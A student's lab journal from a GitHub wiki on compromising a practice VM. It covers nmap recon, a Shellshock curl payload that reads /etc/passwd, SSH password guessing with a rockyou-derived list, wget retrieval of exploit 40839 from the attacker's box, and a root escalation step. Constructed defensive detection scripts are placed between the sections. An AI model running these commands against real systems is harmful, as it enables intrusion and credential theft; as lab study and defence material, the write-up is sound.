Exploiting Cupcake - tmansfield42/Tech-Journal GitHub Wiki

Summary

In this lab we did our first real attack. We started with passive recon, nmap scans, version fingerprinting, etc., and moved on to gaining access, ending with privilege escalation to our own root account.

Tech Journal points:

Here, I am going to describe how I completed each objective as per Deliverable 11.


How did you determine the versions of the two services exposed by cupcake?

I ran sudo nmap -sV -O -A 10.0.5.23, which found two open ports, 80 and 22.


How you dealt with parsing nmap results with nmaptocsv

This was relatively easy. Run sudo nmap -sT -sV --top-ports=100 10.0.5.23 -Pn -oG michaellist.txt, then feed that output to nmaptocsv -l michaellist.txt -d ',' and copy and paste the results into a Google Sheets file.

I had some trouble getting nmaptocsv to install, so I just looked my error up and had to use pipx to install nmaptocsv: pipx install nmaptocsv
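To make clear what nmaptocsv is actually doing with the -oG file, here is an added example (not from the journal and not nmaptocsv's own code) that parses nmap's grepable output into rows and emits CSV with a chosen delimiter. The scan output embedded below is constructed, and the service banners in it are made up rather than cupcake's real ones.

```python
import csv
import io

# Constructed sample of nmap grepable (-oG) output. Fields on a "Host:" line are
# tab-separated; the banners here are invented, not cupcake's real services.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sT -sV --top-ports=100 -Pn -oG michaellist.txt 10.0.5.23
Host: 10.0.5.23 ()\tStatus: Up
Host: 10.0.5.23 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.38 ((Debian))/\tIgnored State: closed (98)
# Nmap done -- 1 IP address (1 host up) scanned
"""

FIELDS = ["host", "port", "state", "protocol", "service", "version"]


def parse_gnmap(text):
    """Return one dict per port entry found in nmap grepable (-oG) output."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and Status-only lines carry no port data
        host = line.split()[1]
        ports_blob = next(f for f in line.split("\t") if f.startswith("Ports:"))
        for entry in ports_blob[len("Ports:"):].split(","):
            entry = entry.strip()
            if not entry:
                continue
            # Each entry is port/state/proto/owner/service/rpcinfo/version/ .
            # Split at most 6 times so a "/" inside the version banner survives.
            port, state, proto, _owner, service, _rpc, rest = entry.split("/", 6)
            version = rest[:-1] if rest.endswith("/") else rest
            rows.append({"host": host, "port": port, "state": state,
                         "protocol": proto, "service": service, "version": version})
    return rows


def to_csv(rows, delimiter=","):
    """Render parsed rows as CSV text, ready to paste into a spreadsheet."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, delimiter=delimiter)
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    print(to_csv(parse_gnmap(SAMPLE_GNMAP)))
```

The parser keys off the tab-separated "Ports:" field only, so the "Ignored State" summary and the comment lines never end up in the spreadsheet; a banner containing a comma would still need escaping, which nmap does not guarantee in -oG output.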


The techniques you used to invoke remote code execution

There were two commands that we used to execute our own commands on the cupcake machine remotely: sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" 10.0.5.23 along with:

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.0.5.23/cgi-bin/status
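Both commands work because a vulnerable bash parses the "() {" function-definition prefix out of any environment variable, and a CGI script hands request headers to bash as environment variables. From the defender's side the same prefix is the detection signal. The following added example (not part of the journal) scans Apache combined-format access log lines for it; the log lines are constructed for this example.

```python
import re

# bash 4.3 and earlier treated any environment value starting with "() {" as a
# function definition and kept parsing past it; that prefix is the signature.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: one normal visitor and two probes against the CGI path.
SAMPLE_ACCESS_LOG = """\
10.0.5.99 - - [10/Nov/2023:14:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
10.0.5.10 - - [10/Nov/2023:14:02:12 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.5.99 - - [10/Nov/2023:14:02:13 +0000] "GET /cgi-bin/status HTTP/1.1" 200 120 "-" "() { :;}; /usr/bin/whoami"
""".splitlines()


def find_shellshock_probes(lines):
    """Return one record per log line whose logged headers carry the Shellshock prefix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-format; skip rather than guess
        fields = [name for name in ("ua", "ref") if SHELLSHOCK_RE.search(m.group(name))]
        if not fields:
            continue
        parts = m.group("req").split()
        path = parts[1] if len(parts) > 1 else m.group("req")
        hits.append({"ip": m.group("ip"), "path": path,
                     "status": m.group("status"), "fields": fields})
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_ACCESS_LOG):
        print(hit)
```

Only the User-Agent and Referer headers appear in the default combined log, so a probe carried in any other header (nmap's http-shellshock script, for instance, is not limited to User-Agent) is invisible here unless the server logs more headers; the authoritative check remains the bash version on the host, and the fix is the patched bash package.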


The generation of a list of passwords and subsequent ssh bruteforce

  • Make sure you're in /usr/share/wordlists

  • Unzip rockyou.txt.gz

  • cat rockyou.txt | grep -i "samwise" > mylist.txt
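A wordlist-driven SSH guess shows up on the target as a burst of "Failed password" lines from one source, sometimes followed by an "Accepted password" line once the right entry is reached. This added example (mine, not from the journal) implements that detection over sshd log lines in syslog format; the log lines, the source addresses and the window and threshold values are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# sshd auth lines as written to /var/log/auth.log (syslog timestamp, no year).
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

# Constructed sample: six failures then a success from 10.0.5.99 within seconds,
# and one mistyped password followed by a normal login from 10.0.5.10.
SAMPLE_AUTH_LOG = """\
Nov 10 14:05:01 cupcake sshd[1201]: Failed password for samwise from 10.0.5.99 port 51234 ssh2
Nov 10 14:05:02 cupcake sshd[1203]: Failed password for samwise from 10.0.5.99 port 51236 ssh2
Nov 10 14:05:03 cupcake sshd[1205]: Failed password for samwise from 10.0.5.99 port 51238 ssh2
Nov 10 14:05:03 cupcake sshd[1207]: Failed password for invalid user admin from 10.0.5.99 port 51240 ssh2
Nov 10 14:05:04 cupcake sshd[1209]: Failed password for samwise from 10.0.5.99 port 51242 ssh2
Nov 10 14:05:05 cupcake sshd[1211]: Failed password for samwise from 10.0.5.99 port 51244 ssh2
Nov 10 14:05:06 cupcake sshd[1213]: Failed password for samwise from 10.0.5.10 port 40010 ssh2
Nov 10 14:05:07 cupcake sshd[1215]: Accepted password for samwise from 10.0.5.99 port 51246 ssh2
Nov 10 14:05:20 cupcake sshd[1217]: Accepted password for samwise from 10.0.5.10 port 40012 ssh2
""".splitlines()


def _prune(window, now, window_seconds):
    """Drop failure timestamps older than the sliding window."""
    while window and (now - window[0]).total_seconds() > window_seconds:
        window.popleft()


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return alerts for sources whose failures in a window reach the threshold,
    and separately for a success that follows such a burst."""
    recent = defaultdict(deque)  # source ip -> timestamps of recent failures
    alerts = []
    for line in lines:
        m = SSHD_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less, fine for deltas
        ip, user, result = m["ip"], m["user"], m["result"]
        window = recent[ip]
        _prune(window, ts, window_seconds)
        if result == "Failed":
            window.append(ts)
            if len(window) == threshold:  # fire once, when the threshold is crossed
                alerts.append({"ip": ip, "kind": "bruteforce",
                               "failures": len(window), "user": user})
        elif len(window) >= threshold:  # success right after a burst: likely a guessed password
            alerts.append({"ip": ip, "kind": "success_after_bruteforce",
                           "failures": len(window), "user": user})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The second alert kind is the one worth paging on: a flood of failures is noise on any internet-facing host, but a success from the same source inside the same window is the event that warrants checking that account. Rate limiting and key-only authentication on sshd remove the class of attack entirely.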


Transfer of files using python and wget or any other mechanism you chose

  • If you use searchsploit module 40839, you can quickly spin up an HTTP server on your Kali machine with python3 -m http.server <ephemeralporthere>

  • On cupcake, make your own directory and run wget http://<personalkaliboxIP>:<chosenEphemeralPort>/40839.c


Compiling and running a privilege escalation exploit (It can be different than the demo!)

  • Assuming you're using module 40839, run the file you fetched from your HTTP server; it adds a new entry to /etc/passwd and saves a backup of the original /etc/passwd to /tmp/passwd.bak
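The observable result of that step is a change to /etc/passwd: a new account, possibly with UID 0, and a backup copy left in /tmp. The added example below (not from the journal or the exploit) shows the checks a defender or forensic reviewer would run afterwards: list every UID-0 account, and diff the current file against a known-good copy (the /tmp/passwd.bak the exploit leaves, or better, a baseline from backups). The passwd contents and the added account name are constructed.

```python
# Constructed baseline and post-incident /etc/passwd contents. The account name
# "sam0" is made up for this example; real exploits pick their own.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
samwise:x:1000:1000:Samwise:/home/samwise:/bin/bash
"""

CURRENT_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
sam0:$6$constructedhash$:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
samwise:x:1000:1000:Samwise:/home/samwise:/bin/bash
"""


def parse_passwd(text):
    """Map account name -> fields for each well-formed passwd line."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue  # malformed line; a real audit would flag it, too
        name, _pw, uid, gid, _gecos, home, shell = parts
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def uid0_accounts(text):
    """Every account that resolves to root privileges (UID 0), root included."""
    return sorted(name for name, u in parse_passwd(text).items() if u["uid"] == 0)


def diff_passwd(baseline_text, current_text):
    """Accounts added, removed, or altered relative to a known-good copy."""
    base, cur = parse_passwd(baseline_text), parse_passwd(current_text)
    return {
        "added": sorted(n for n in cur if n not in base),
        "removed": sorted(n for n in base if n not in cur),
        "changed": sorted(n for n in cur if n in base and cur[n] != base[n]),
    }


if __name__ == "__main__":
    print("UID-0 accounts:", uid0_accounts(CURRENT_PASSWD))
    print("diff vs baseline:", diff_passwd(BASELINE_PASSWD, CURRENT_PASSWD))
```

A single UID-0 account named root is the expected answer on a stock Linux host; anything else in that list, or any entry in "added" or "changed", is a finding. The /tmp/passwd.bak file itself is evidence of this particular exploit's run and should be preserved, not deleted, before the host is rebuilt with a kernel that carries the fix.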